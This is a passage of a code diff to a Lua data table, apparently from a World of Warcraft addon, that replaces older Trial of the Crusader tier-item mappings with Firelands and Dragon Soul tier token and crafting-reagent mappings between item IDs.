Firehawk Hood + 71539, -- Dark Phoenix Helmet }, - -- Thrall's Helm of Triumph - ["48333"] = { - 47242, -- Trophy of the Crusade + -- Leggings of the Fiery Vanquisher + ["71671"] = { + 71479, -- Elementium Deathplate Greaves + 71484, -- Elementium Deathplate Legguards + 71489, -- Obsidian Arborweave Legguards + 71493, -- Obsidian Arborweave Legwraps + 71498, -- Obsidian Arborweave Leggings + 71509, -- Firehawk Leggings + 71540, -- Dark Phoenix Legguards }, - -- Thrall's Gloves of Triumph - ["48334"] = { - 47242, -- Trophy of the Crusade + -- Chest of the Fiery Vanquisher + ["71672"] = { + 71476, -- Elementium Deathplate Breastplate + 71481, -- Elementium Deathplate Chestguard + 71486, -- Obsidian Arborweave Raiment + 71499, -- Obsidian Arborweave Vestment + 71510, -- Firehawk Robes + 71537, -- Dark Phoenix Tunic }, - -- Thrall's Hauberk of Triumph - ["48335"] = { - 47242, -- Trophy of the Crusade + -- Shoulders of the Fiery Vanquisher + ["71673"] = { + 71480, -- Elementium Deathplate Pauldrons + 71485, -- Elementium Deathplate Shoulderguards + 71490, -- Obsidian Arborweave Spaulders + 71495, -- Obsidian Arborweave Mantle + 71500, -- Obsidian Arborweave Shoulderwraps + 71511, -- Firehawk Mantle + 71541, -- Dark Phoenix Spaulders }, - -- Nobundo's Chestguard of Triumph - ["48346"] = { - 47242, -- Trophy of the Crusade + -- Mantle of the Fiery Vanquisher + ["71674"] = { + 70951, -- Elementium Deathplate Shoulderguards + 71049, -- Dark Phoenix Spaulders + 71062, -- Elementium Deathplate Pauldrons + 71101, -- Obsidian Arborweave Spaulders + 71106, -- Obsidian Arborweave Mantle + 71111, -- Obsidian Arborweave Shoulderwraps + 71290, -- Firehawk Mantle }, - -- Nobundo's Grips of Triumph - ["48347"] = { - 47242, -- Trophy of the Crusade + -- Helm of the Fiery Conqueror + ["71675"] = { + 70948, -- Immolation Faceguard + 71065, -- Immolation Helmet + 71093, -- Immolation Headguard + 71272, -- Cowl of the Cleansing Flame + 71277, -- Hood of the Cleansing Flame + 71282, -- Balespider's Hood }, - -- Nobundo's Faceguard of Triumph - ["48348"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Fiery Conqueror + ["71676"] = { + 71513, -- Immolation Gauntlets + 71518, -- Immolation Gloves + 71523, -- Immolation Handguards + 71527, -- Handwraps of the Cleansing Flame + 71532, -- Gloves of the Cleansing Flame + 71594, -- Balespider's Handwraps }, - -- Nobundo's War-Kilt of Triumph - ["48349"] = { - 47242, -- Trophy of the Crusade + -- Crown of the Fiery Conqueror + ["71677"] = { + 71514, -- Immolation Helmet + 71519, -- Immolation Headguard + 71524, -- Immolation Faceguard + 71528, -- Cowl of the Cleansing Flame + 71533, -- Hood of the Cleansing Flame + 71595, -- Balespider's Hood }, - -- Nobundo's Shoulderguards of Triumph - ["48350"] = { - 47242, -- Trophy of the Crusade + -- Leggings of the Fiery Conqueror + ["71678"] = { + 71515, -- Immolation Legplates + 71520, -- Immolation Greaves + 71525, -- Immolation Legguards + 71529, -- Legwraps of the Cleansing Flame + 71534, -- Leggings of the Cleansing Flame + 71596, -- Balespider's Leggings }, - -- Nobundo's Shoulderguards of Triumph - ["48351"] = { - 47558, -- Regalia of the Grand Protector + -- Chest of the Fiery Conqueror + ["71679"] = { + 71512, -- Immolation Battleplate + 71517, -- Immolation Breastplate + 71522, -- Immolation Chestguard + 71530, -- Robes of the Cleansing Flame + 71535, -- Vestment of the Cleansing Flame + 71597, -- Balespider's Robes }, - -- Nobundo's War-Kilt of Triumph - ["48352"] = { - 47558, -- Regalia of the Grand Protector + -- Shoulders of the Fiery Conqueror + ["71680"] = { + 71516, -- Immolation Pauldrons + 71521, -- Immolation Mantle + 71526, -- Immolation Shoulderguards + 71531, -- Mantle of the Cleansing Flame + 71536, -- Shoulderwraps of the Cleansing Flame + 71598, -- Balespider's Mantle }, - -- Nobundo's Faceguard of Triumph - ["48353"] = { - 47558, -- Regalia of the Grand Protector + -- Mantle of the Fiery Conqueror + ["71681"] = { + 70946, -- Immolation Shoulderguards + 71067, -- Immolation Pauldrons + 71095, -- Immolation Mantle + 71275, -- Mantle of the Cleansing Flame + 71280, -- Shoulderwraps of the Cleansing Flame + 71285, -- Balespider's Mantle }, - -- Nobundo's Grips of Triumph - ["48354"] = { - 47558, -- Regalia of the Grand Protector + -- Helm of the Fiery Protector + ["71682"] = { + 70944, -- Faceguard of the Molten Giant + 71051, -- Flamewaker's Headguard + 71070, -- Helmet of the Molten Giant + 71293, -- Erupting Volcanic Headpiece + 71298, -- Erupting Volcanic Faceguard + 71303, -- Erupting Volcanic Helmet }, - -- Nobundo's Chestguard of Triumph - ["48355"] = { - 47558, -- Regalia of the Grand Protector + -- Gauntlets of the Fiery Protector + ["71683"] = { + 71502, -- Flamewaker's Gloves + 71543, -- Erupting Volcanic Handwraps + 71548, -- Erupting Volcanic Grips + 71553, -- Erupting Volcanic Gloves + 71601, -- Gauntlets of the Molten Giant + 71605, -- Handguards of the Molten Giant }, - -- Thrall's Chestguard of Triumph - ["48356"] = { - 47558, -- Regalia of the Grand Protector + -- Crown of the Fiery Protector + ["71684"] = { + 71503, -- Flamewaker's Headguard + 71544, -- Erupting Volcanic Faceguard + 71549, -- Erupting Volcanic Helmet + 71554, -- Erupting Volcanic Headpiece + 71599, -- Helmet of the Molten Giant + 71606, -- Faceguard of the Molten Giant }, - -- Thrall's Grips of Triumph - ["48357"] = { - 47558, -- Regalia of the Grand Protector + -- Leggings of the Fiery Protector + ["71685"] = { + 71504, -- Flamewaker's Legguards + 71545, -- Erupting Volcanic Legwraps + 71550, -- Erupting Volcanic Legguards + 71555, -- Erupting Volcanic Kilt + 71602, -- Legplates of the Molten Giant + 71607, -- Legguards of the Molten Giant }, - -- Thrall's Faceguard of Triumph - ["48358"] = { - 47558, -- Regalia of the Grand Protector + -- Chest of the Fiery Protector + ["71686"] = { + 71501, -- Flamewaker's Tunic + 71542, -- Erupting Volcanic Tunic + 71547, -- Erupting Volcanic Cuirass + 71552, -- Erupting Volcanic Hauberk + 71600, -- Battleplate of the Molten Giant + 71604, -- Chestguard of the Molten Giant }, - -- Thrall's War-Kilt of Triumph - ["48359"] = { - 47558, -- Regalia of the Grand Protector + -- Shoulders of the Fiery Protector + ["71687"] = { + 71505, -- Flamewaker's Spaulders + 71546, -- Erupting Volcanic Mantle + 71551, -- Erupting Volcanic Spaulders + 71556, -- Erupting Volcanic Shoulderwraps + 71603, -- Pauldrons of the Molten Giant + 71608, -- Shoulderguards of the Molten Giant }, - -- Thrall's Shoulderguards of Triumph - ["48360"] = { - 47558, -- Regalia of the Grand Protector + -- Mantle of the Fiery Protector + ["71688"] = { + 70941, -- Shoulderguards of the Molten Giant + 71053, -- Flamewaker's Spaulders + 71072, -- Pauldrons of the Molten Giant + 71295, -- Erupting Volcanic Shoulderwraps + 71300, -- Erupting Volcanic Mantle + 71305, -- Erupting Volcanic Spaulders }, - -- Thrall's Shoulderguards of Triumph - ["48361"] = { - 47242, -- Trophy of the Crusade + -- Lavaquake Legwraps + ["71980"] = { + 71998, -- Essence of Destruction }, - -- Thrall's War-Kilt of Triumph - ["48362"] = { - 47242, -- Trophy of the Crusade + -- World Mender's Pants + ["71981"] = { + 71998, -- Essence of Destruction }, - -- Thrall's Faceguard of Triumph - ["48363"] = { - 47242, -- Trophy of the Crusade + -- Pyrium Legplates of Purified Evil + ["71982"] = { + 71998, -- Essence of Destruction }, - -- Thrall's Grips of Triumph - ["48364"] = { - 47242, -- Trophy of the Crusade + -- Unstoppable Destroyer's Legplates + ["71983"] = { + 71998, -- Essence of Destruction }, - -- Thrall's Chestguard of Triumph - ["48365"] = { - 47242, -- Trophy of the Crusade + -- Foundations of Courage + ["71984"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Battleplate of Triumph - ["48376"] = { - 47242, -- Trophy of the Crusade + -- Bladeshadow Leggings + ["71985"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Gauntlets of Triumph - ["48377"] = { - 47242, -- Trophy of the Crusade + -- Leggings of Nature's Champion + ["71986"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Helmet of Triumph - ["48378"] = { - 47242, -- Trophy of the Crusade + -- Rended Earth Leggings + ["71987"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Legplates of Triumph - ["48379"] = { - 47242, -- Trophy of the Crusade + -- Deathscale Leggings + ["71988"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Shoulderplates of Triumph - ["48380"] = { - 47242, -- Trophy of the Crusade + -- Bracers of Unconquered Power + ["71989"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Shoulderplates of Triumph - ["48381"] = { - 47558, -- Regalia of the Grand Protector + -- Dreamwraps of the Light + ["71990"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Legplates of Triumph - ["48382"] = { - 47558, -- Regalia of the Grand Protector + -- Soul Redeemer Bracers + ["71991"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Helmet of Triumph - ["48383"] = { - 47558, -- Regalia of the Grand Protector + -- Bracers of Destructive Strength + ["71992"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Gauntlets of Triumph - ["48384"] = { - 47558, -- Regalia of the Grand Protector + -- Titanguard Wristplates + ["71993"] = { + 71998, -- Essence of Destruction }, - -- Wrynn's Battleplate of Triumph - ["48385"] = { - 47558, -- Regalia of the Grand Protector + -- Bladeshadow Wristguards + ["71994"] = { + 71998, -- Essence of Destruction }, - -- Hellscream's Battleplate of Triumph - ["48391"] = { - 47242, -- Trophy of the Crusade + -- Bracers of Flowing Serenity + ["71995"] = { + 71998, -- Essence of Destruction }, - -- Hellscream's Gauntlets of Triumph - ["48392"] = { - 47242, -- Trophy of the Crusade + -- Bracers of the Hunter-Killer + ["71996"] = { + 71998, -- Essence of Destruction }, - -- Hellscream's Helmet of Triumph - ["48393"] = { - 47242, -- Trophy of the Crusade + -- Thundering Deathscale Wristguards + ["71997"] = { + 71998, -- Essence of Destruction }, - -- Hellscream's Legplates of Triumph - ["48394"] = { - 47242, -- Trophy of the Crusade + -- Essence of Destruction + ["71998"] = { + 71980, -- Lavaquake Legwraps + 71981, -- World Mender's Pants + 71982, -- Pyrium Legplates of Purified Evil + 71983, -- Unstoppable Destroyer's Legplates + 71984, -- Foundations of Courage + 71985, -- Bladeshadow Leggings + 71986, -- Leggings of Nature's Champion + 71987, -- Rended Earth Leggings + 71988, -- Deathscale Leggings + 71989, -- Bracers of Unconquered Power + 71990, -- Dreamwraps of the Light + 71991, -- Soul Redeemer Bracers + 71992, -- Bracers of Destructive Strength + 71993, -- Titanguard Wristplates + 71994, -- Bladeshadow Wristguards + 71995, -- Bracers of Flowing Serenity + 71996, -- Bracers of the Hunter-Killer + 71997, -- Thundering Deathscale Wristguards }, - -- Hellscream's Shoulderplates of Triumph - ["48395"] = { - 47242, -- Trophy of the Crusade + -- Time Lord's Gloves + ["76212"] = { + 78173, -- Gauntlets of the Corrupted Vanquisher }, - -- Hellscream's Battleplate of Triumph - ["48396"] = { - 47558, -- Regalia of the Grand Protector + -- Time Lord's Hood + ["76213"] = { + 78172, -- Crown of the Corrupted Vanquisher }, - -- Hellscream's Gauntlets of Triumph - ["48397"] = { - 47558, -- Regalia of the Grand Protector + -- Time Lord's Leggings + ["76214"] = { + 78171, -- Leggings of the Corrupted Vanquisher }, - -- Hellscream's Helmet of Triumph - ["48398"] = { - 47558, -- Regalia of the Grand Protector + -- Time Lord's Robes + ["76215"] = { + 78174, -- Chest of the Corrupted Vanquisher }, - -- Hellscream's Legplates of Triumph - ["48399"] = { - 47558, -- Regalia of the Grand Protector + -- Time Lord's Mantle + ["76216"] = { + 78170, -- Shoulders of the Corrupted Vanquisher }, - -- Hellscream's Shoulderplates of Triumph - ["48400"] = { - 47558, -- Regalia of the Grand Protector + -- Mantle of the Faceless Shroud + ["76339"] = { + 78180, -- Shoulders of the Corrupted Conqueror }, - -- Wrynn's Greathelm of Triumph - ["48430"] = { - 47242, -- Trophy of the Crusade + -- Robes of the Faceless Shroud + ["76340"] = { + 78184, -- Chest of the Corrupted Conqueror }, - -- Wrynn's Greathelm of Triumph - ["48433"] = { - 47558, -- Regalia of the Grand Protector + -- Leggings of the Faceless Shroud + ["76341"] = { + 78181, -- Leggings of the Corrupted Conqueror }, - -- Wrynn's Legguards of Triumph - ["48446"] = { - 47242, -- Trophy of the Crusade + -- Hood of the Faceless Shroud + ["76342"] = { + 78182, -- Crown of the Corrupted Conqueror }, - -- Wrynn's Legguards of Triumph - ["48447"] = { - 47558, -- Regalia of the Grand Protector + -- Gloves of the Faceless Shroud + ["76343"] = { + 78183, -- Gauntlets of the Corrupted Conqueror }, - -- Wrynn's Breastplate of Triumph - ["48450"] = { - 47242, -- Trophy of the Crusade + -- Mantle of Dying Light + ["76344"] = { + 78180, -- Shoulders of the Corrupted Conqueror }, - -- Wrynn's Breastplate of Triumph - ["48451"] = { - 47558, -- Regalia of the Grand Protector + -- Robes of Dying Light + ["76345"] = { + 78184, -- Chest of the Corrupted Conqueror }, - -- Wrynn's Handguards of Triumph - ["48452"] = { - 47242, -- Trophy of the Crusade + -- Leggings of Dying Light + ["76346"] = { + 78181, -- Leggings of the Corrupted Conqueror }, - -- Wrynn's Handguards of Triumph - ["48453"] = { - 47558, -- Regalia of the Grand Protector + -- Hood of Dying Light + ["76347"] = { + 78182, -- Crown of the Corrupted Conqueror }, - -- Wrynn's Pauldrons of Triumph - ["48454"] = { - 47242, -- Trophy of the Crusade + -- Gloves of Dying Light + ["76348"] = { + 78183, -- Gauntlets of the Corrupted Conqueror }, - -- Wrynn's Pauldrons of Triumph - ["48455"] = { - 47558, -- Regalia of the Grand Protector + -- Handwraps of Dying Light + ["76357"] = { + 78183, -- Gauntlets of the Corrupted Conqueror }, - -- Hellscream's Breastplate of Triumph - ["48461"] = { - 47242, -- Trophy of the Crusade + -- Cowl of Dying Light + ["76358"] = { + 78182, -- Crown of the Corrupted Conqueror }, - -- Hellscream's Handguards of Triumph - ["48462"] = { - 47242, -- Trophy of the Crusade + -- Legwraps of Dying Light + ["76359"] = { + 78181, -- Leggings of the Corrupted Conqueror }, - -- Hellscream's Greathelm of Triumph - ["48463"] = { - 47242, -- Trophy of the Crusade + -- Robes of Dying Light + ["76360"] = { + 78184, -- Chest of the Corrupted Conqueror }, - -- Hellscream's Legguards of Triumph - ["48464"] = { - 47242, -- Trophy of the Crusade + -- Mantle of Dying Light + ["76361"] = { + 78180, -- Shoulders of the Corrupted Conqueror }, - -- Hellscream's Pauldrons of Triumph - ["48465"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Handwraps + ["76749"] = { + 78173, -- Gauntlets of the Corrupted Vanquisher }, - -- Hellscream's Breastplate of Triumph - ["48466"] = { - 47558, -- Regalia of the Grand Protector + -- Deep Earth Helm + ["76750"] = { + 78172, -- Crown of the Corrupted Vanquisher }, - -- Hellscream's Handguards of Triumph - ["48467"] = { - 47558, -- Regalia of the Grand Protector + -- Deep Earth Legwraps + ["76751"] = { + 78171, -- Leggings of the Corrupted Vanquisher }, - -- Hellscream's Greathelm of Triumph - ["48468"] = { - 47558, -- Regalia of the Grand Protector + -- Deep Earth Robes + ["76752"] = { + 78174, -- Chest of the Corrupted Vanquisher }, - -- Hellscream's Legguards of Triumph - ["48469"] = { - 47558, -- Regalia of the Grand Protector + -- Deep Earth Mantle + ["76753"] = { + 78170, -- Shoulders of the Corrupted Vanquisher }, - -- Hellscream's Pauldrons of Triumph - ["48470"] = { - 47558, -- Regalia of the Grand Protector + -- Spiritwalker's Tunic + ["76756"] = { + 78179, -- Chest of the Corrupted Protector }, - -- Thassarian's Battleplate of Triumph - ["48481"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Handwraps + ["76757"] = { + 78178, -- Gauntlets of the Corrupted Protector }, - -- Thassarian's Gauntlets of Triumph - ["48482"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Faceguard + ["76758"] = { + 78177, -- Crown of the Corrupted Protector }, - -- Thassarian's Helmet of Triumph - ["48483"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Legwraps + ["76759"] = { + 78176, -- Leggings of the Corrupted Protector }, - -- Thassarian's Legplates of Triumph - ["48484"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Mantle + ["76760"] = { + 78175, -- Shoulders of the Corrupted Protector }, - -- Thassarian's Shoulderplates of Triumph - ["48485"] = { - 47242, -- Trophy of the Crusade + -- Breastplate of Radiant Glory + ["76765"] = { + 78184, -- Chest of the Corrupted Conqueror }, - -- Thassarian's Shoulderplates of Triumph - ["48486"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Gloves of Radiant Glory + ["76766"] = { + 78183, -- Gauntlets of the Corrupted Conqueror }, - -- Thassarian's Legplates of Triumph - ["48487"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Headguard of Radiant Glory + ["76767"] = { + 78182, -- Crown of the Corrupted Conqueror }, - -- Thassarian's Helmet of Triumph - ["48488"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Greaves of Radiant Glory + ["76768"] = { + 78181, -- Leggings of the Corrupted Conqueror }, - -- Thassarian's Gauntlets of Triumph - ["48489"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Mantle of Radiant Glory + ["76769"] = { + 78180, -- Shoulders of the Corrupted Conqueror }, - -- Thassarian's Battleplate of Triumph - ["48490"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Battleplate of Radiant Glory + ["76874"] = { + 78184, -- Chest of the Corrupted Conqueror }, - -- Koltira's Battleplate of Triumph - ["48491"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Gauntlets of Radiant Glory + ["76875"] = { + 78183, -- Gauntlets of the Corrupted Conqueror }, - -- Koltira's Gauntlets of Triumph - ["48492"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Helmet of Radiant Glory + ["76876"] = { + 78182, -- Crown of the Corrupted Conqueror + }, + -- Legplates of Radiant Glory + ["76877"] = { + 78181, -- Leggings of the Corrupted Conqueror }, - -- Koltira's Helmet of Triumph - ["48493"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Pauldrons of Radiant Glory + ["76878"] = { + 78180, -- Shoulders of the Corrupted Conqueror }, - -- Koltira's Legplates of Triumph - ["48494"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Necrotic Boneplate Breastplate + ["76974"] = { + 78174, -- Chest of the Corrupted Vanquisher }, - -- Koltira's Shoulderplates of Triumph - ["48495"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Necrotic Boneplate Gauntlets + ["76975"] = { + 78173, -- Gauntlets of the Corrupted Vanquisher }, - -- Koltira's Shoulderplates of Triumph - ["48496"] = { - 47242, -- Trophy of the Crusade + -- Necrotic Boneplate Helmet + ["76976"] = { + 78172, -- Crown of the Corrupted Vanquisher }, - -- Koltira's Legplates of Triumph - ["48497"] = { - 47242, -- Trophy of the Crusade + -- Necrotic Boneplate Greaves + ["76977"] = { + 78171, -- Leggings of the Corrupted Vanquisher }, - -- Koltira's Helmet of Triumph - ["48498"] = { - 47242, -- Trophy of the Crusade + -- Necrotic Boneplate Pauldrons + ["76978"] = { + 78170, -- Shoulders of the Corrupted Vanquisher }, - -- Koltira's Gauntlets of Triumph - ["48499"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Helmet + ["76983"] = { + 78177, -- Crown of the Corrupted Protector }, - -- Koltira's Battleplate of Triumph - ["48500"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Battleplate + ["76984"] = { + 78179, -- Chest of the Corrupted Protector }, - -- Thassarian's Chestguard of Triumph - ["48538"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Gauntlets + ["76985"] = { + 78178, -- Gauntlets of the Corrupted Protector }, - -- Thassarian's Handguards of Triumph - ["48539"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Legplates + ["76986"] = { + 78176, -- Leggings of the Corrupted Protector }, - -- Thassarian's Faceguard of Triumph - ["48540"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Pauldrons + ["76987"] = { + 78175, -- Shoulders of the Corrupted Protector }, - -- Thassarian's Legguards of Triumph - ["48541"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Chestguard + ["76988"] = { + 78179, -- Chest of the Corrupted Protector }, - -- Thassarian's Pauldrons of Triumph - ["48542"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Handguards + ["76989"] = { + 78178, -- Gauntlets of the Corrupted Protector }, - -- Thassarian's Pauldrons of Triumph - ["48543"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Colossal Dragonplate Faceguard + ["76990"] = { + 78177, -- Crown of the Corrupted Protector }, - -- Thassarian's Legguards of Triumph - ["48544"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Colossal Dragonplate Legguards + ["76991"] = { + 78176, -- Leggings of the Corrupted Protector }, - -- Thassarian's Faceguard of Triumph - ["48545"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Colossal Dragonplate Shoulderguards + ["76992"] = { + 78175, -- Shoulders of the Corrupted Protector }, - -- Thassarian's Handguards of Triumph - ["48546"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Chestguard of Radiant Glory + ["77003"] = { + 78184, -- Chest of the Corrupted Conqueror }, - -- Thassarian's Chestguard of Triumph - ["48547"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Handguards of Radiant Glory + ["77004"] = { + 78183, -- Gauntlets of the Corrupted Conqueror }, - -- Koltira's Chestguard of Triumph - ["48548"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Faceguard of Radiant Glory + ["77005"] = { + 78182, -- Crown of the Corrupted Conqueror }, - -- Koltira's Handguards of Triumph - ["48549"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Legguards of Radiant Glory + ["77006"] = { + 78181, -- Leggings of the Corrupted Conqueror }, - -- Koltira's Faceguard of Triumph - ["48550"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Shoulderguards of Radiant Glory + ["77007"] = { + 78180, -- Shoulders of the Corrupted Conqueror }, - -- Koltira's Legguards of Triumph - ["48551"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Necrotic Boneplate Chestguard + ["77008"] = { + 78174, -- Chest of the Corrupted Vanquisher }, - -- Koltira's Pauldrons of Triumph - ["48552"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Necrotic Boneplate Handguards + ["77009"] = { + 78173, -- Gauntlets of the Corrupted Vanquisher }, - -- Koltira's Pauldrons of Triumph - ["48553"] = { - 47242, -- Trophy of the Crusade + -- Necrotic Boneplate Faceguard + ["77010"] = { + 78172, -- Crown of the Corrupted Vanquisher }, - -- Koltira's Legguards of Triumph - ["48554"] = { - 47242, -- Trophy of the Crusade + -- Necrotic Boneplate Legguards + ["77011"] = { + 78171, -- Leggings of the Corrupted Vanquisher }, - -- Koltira's Faceguard of Triumph - ["48555"] = { - 47242, -- Trophy of the Crusade + -- Necrotic Boneplate Shoulderguards + ["77012"] = { + 78170, -- Shoulders of the Corrupted Vanquisher }, - -- Koltira's Handguards of Triumph - ["48556"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Raiment + ["77013"] = { + 78174, -- Chest of the Corrupted Vanquisher }, - -- Koltira's Chestguard of Triumph - ["48557"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Grips + ["77014"] = { + 78173, -- Gauntlets of the Corrupted Vanquisher }, - -- Turalyon's Tunic of Triumph - ["48575"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Headpiece + ["77015"] = { + 78172, -- Crown of the Corrupted Vanquisher }, - -- Turalyon's Gloves of Triumph - ["48576"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Legguards + ["77016"] = { + 78171, -- Leggings of the Corrupted Vanquisher }, - -- Turalyon's Headpiece of Triumph - ["48577"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Spaulders + ["77017"] = { + 78170, -- Shoulders of the Corrupted Vanquisher }, - -- Turalyon's Greaves of Triumph - ["48578"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Gloves + ["77018"] = { + 78173, -- Gauntlets of the Corrupted Vanquisher }, - -- Turalyon's Spaulders of Triumph - ["48579"] = { - 47242, -- Trophy of the Crusade + -- Deep Earth Cover + ["77019"] = { + 78172, -- Crown of the Corrupted Vanquisher }, - -- Turalyon's Spaulders of Triumph - ["48580"] = { - 47557, -- Regalia of the Grand Conqueror + -- Deep Earth Leggings + ["77020"] = { + 78171, -- Leggings of the Corrupted Vanquisher }, - -- Turalyon's Greaves of Triumph - ["48581"] = { - 47557, -- Regalia of the Grand Conqueror + -- Deep Earth Vestment + ["77021"] = { + 78174, -- Chest of the Corrupted Vanquisher }, - -- Turalyon's Headpiece of Triumph - ["48582"] = { - 47557, -- Regalia of the Grand Conqueror + -- Deep Earth Shoulderwraps + ["77022"] = { + 78170, -- Shoulders of the Corrupted Vanquisher }, - -- Turalyon's Gloves of Triumph - ["48583"] = { - 47557, -- Regalia of the Grand Conqueror + -- Blackfang Battleweave Tunic + ["77023"] = { + 78174, -- Chest of the Corrupted Vanquisher }, - -- Turalyon's Tunic of Triumph - ["48584"] = { - 47557, -- Regalia of the Grand Conqueror + -- Blackfang Battleweave Gloves + ["77024"] = { + 78173, -- Gauntlets of the Corrupted Vanquisher }, - -- Liadrin's Spaulders of Triumph - ["48585"] = { - 47557, -- Regalia of the Grand Conqueror + -- Blackfang Battleweave Helmet + ["77025"] = { + 78172, -- Crown of the Corrupted Vanquisher }, - -- Liadrin's Greaves of Triumph - ["48586"] = { - 47557, -- Regalia of the Grand Conqueror + -- Blackfang Battleweave Legguards + ["77026"] = { + 78171, -- Leggings of the Corrupted Vanquisher }, - -- Liadrin's Headpiece of Triumph - ["48587"] = { - 47557, -- Regalia of the Grand Conqueror + -- Blackfang Battleweave Spaulders + ["77027"] = { + 78170, -- Shoulders of the Corrupted Vanquisher }, - -- Liadrin's Gloves of Triumph - ["48588"] = { - 47557, -- Regalia of the Grand Conqueror + -- Wyrmstalker's Tunic + ["77028"] = { + 78179, -- Chest of the Corrupted Protector + }, + -- Wyrmstalker's Gloves + ["77029"] = { + 78178, -- Gauntlets of the Corrupted Protector }, - -- Liadrin's Tunic of Triumph - ["48589"] = { - 47557, -- Regalia of the Grand Conqueror + -- Wyrmstalker's Headguard + ["77030"] = { + 78177, -- Crown of the Corrupted Protector }, - -- Liadrin's Spaulders of Triumph - ["48590"] = { - 47242, -- Trophy of the Crusade + -- Wyrmstalker's Legguards + ["77031"] = { + 78176, -- Leggings of the Corrupted Protector }, - -- Liadrin's Greaves of Triumph - ["48591"] = { - 47242, -- Trophy of the Crusade + -- Wyrmstalker's Spaulders + ["77032"] = { + 78175, -- Shoulders of the Corrupted Protector }, - -- Liadrin's Headpiece of Triumph - ["48592"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Shoulderwraps + ["77035"] = { + 78175, -- Shoulders of the Corrupted Protector }, - -- Liadrin's Gloves of Triumph - ["48593"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Kilt + ["77036"] = { + 78176, -- Leggings of the Corrupted Protector }, - -- Liadrin's Tunic of Triumph - ["48594"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Headpiece + ["77037"] = { + 78177, -- Crown of the Corrupted Protector }, - -- Turalyon's Battleplate of Triumph - ["48607"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Gloves + ["77038"] = { + 78178, -- Gauntlets of the Corrupted Protector }, - -- Turalyon's Gauntlets of Triumph - ["48608"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Hauberk + ["77039"] = { + 78179, -- Chest of the Corrupted Protector }, - -- Turalyon's Helm of Triumph - ["48609"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Cuirass + ["77040"] = { + 78179, -- Chest of the Corrupted Protector }, - -- Turalyon's Legplates of Triumph - ["48610"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Grips + ["77041"] = { + 78178, -- Gauntlets of the Corrupted Protector }, - -- Turalyon's Shoulderplates of Triumph - ["48611"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Helmet + ["77042"] = { + 78177, -- Crown of the Corrupted Protector }, - -- Turalyon's Shoulderplates of Triumph - ["48612"] = { - 47557, -- Regalia of the Grand Conqueror + -- Spiritwalker's Legguards + ["77043"] = { + 78176, -- Leggings of the Corrupted Protector }, - -- Turalyon's Legplates of Triumph - ["48613"] = { - 47557, -- Regalia of the Grand Conqueror + -- Spiritwalker's Spaulders + ["77044"] = { + 78175, -- Shoulders of the Corrupted Protector }, - -- Turalyon's Helm of Triumph - ["48614"] = { - 47557, -- Regalia of the Grand Conqueror + -- Golad, Twilight of Aspects + ["77949"] = { + 77952, -- Elementium Gem Cluster }, - -- Turalyon's Gauntlets of Triumph - ["48615"] = { - 47557, -- Regalia of the Grand Conqueror + -- Tiriosh, Nightmare of Ages + ["77950"] = { + 77952, -- Elementium Gem Cluster }, - -- Turalyon's Battleplate of Triumph - ["48616"] = { - 47557, -- Regalia of the Grand Conqueror + -- Elementium Gem Cluster + ["77952"] = { + 77949, -- Golad, Twilight of Aspects + 77950, -- Tiriosh, Nightmare of Ages }, - -- Liadrin's Battleplate of Triumph - ["48617"] = { - 47557, -- Regalia of the Grand Conqueror + -- Shoulders of the Corrupted Vanquisher + ["78170"] = { + 76216, -- Time Lord's Mantle + 76753, -- Deep Earth Mantle + 76978, -- Necrotic Boneplate Pauldrons + 77012, -- Necrotic Boneplate Shoulderguards + 77017, -- Deep Earth Spaulders + 77022, -- Deep Earth Shoulderwraps + 